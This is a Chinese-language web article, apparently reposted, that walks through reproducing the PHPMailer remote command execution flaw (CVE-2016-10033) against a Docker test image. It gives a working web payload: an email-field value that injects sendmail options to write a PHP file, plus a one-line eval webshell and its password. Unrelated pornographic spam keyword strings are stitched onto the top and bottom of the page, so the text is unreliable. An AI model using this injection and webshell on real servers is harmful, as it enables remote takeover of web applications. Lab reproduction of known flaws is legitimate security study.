国产成人精品18p,天天干成人网,无码专区狠狠躁天天躁,美女脱精光隐私扒开免费观看

PHPMailer中怎么復現遠程命令執行漏洞

發(fā)布時(shí)間:2021-09-14 11:25 來(lái)源:億速云 閱讀:0 作者:Leah 欄目: 網(wǎng)絡(luò )安全

PHPMailer中怎么復現遠程命令執行漏洞,相信很多沒(méi)有經(jīng)驗的人對此束手無(wú)策,為此本文總結了問(wèn)題出現的原因和解決方法,通過(guò)這篇文章希望你能解決這個(gè)問(wèn)題。

一、漏洞簡(jiǎn)介

PHPMailer是PHP電子郵件創(chuàng )建及傳輸類(lèi),用于多個(gè)開(kāi)源項目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

PHPMailer < 5.2.18版本存在安全漏洞,可使未經(jīng)身份驗證的遠程攻擊者在Web用戶(hù)上下文中執行任意代碼,遠程控制目標web應用。

二、影響版本:

PHPMailer<5.2.18

三、漏洞復現

Docker環(huán)境:

dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033

拉去鏡像啟動(dòng)環(huán)境:

http://192.168.1.107:8080/

http://192.168.1.107:8080/在name處隨便輸入比如“aaa”,在email處輸入:"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message處輸入一句話(huà)木馬:<?php@eval($_POST['thelostworld']);?>

上傳完一句話(huà)木馬后,頁(yè)面會(huì )響應3-5分鐘,響應時(shí)間較長(cháng)

木馬地址:http://192.168.1.107:8080/a.php 密碼:thelostworld

虛擬終端:

使用腳本:

獲取腳本后臺回復“PHPMailer”獲取腳本

免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng )、來(lái)自互聯(lián)網(wǎng)轉載和分享為主,文章觀(guān)點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權請聯(lián)系QQ:712375056 進(jìn)行舉報,并提供相關(guān)證據,一經(jīng)查實(shí),將立刻刪除涉嫌侵權內容。

无套内射无矿码免费看黄| 国产成人免费A在线视频| 色噜噜狠狠色综合网| 国产人成高清在线视频99| 人善之交Z0OZO0D0G人善| 久久久久人妻一区精品果冻|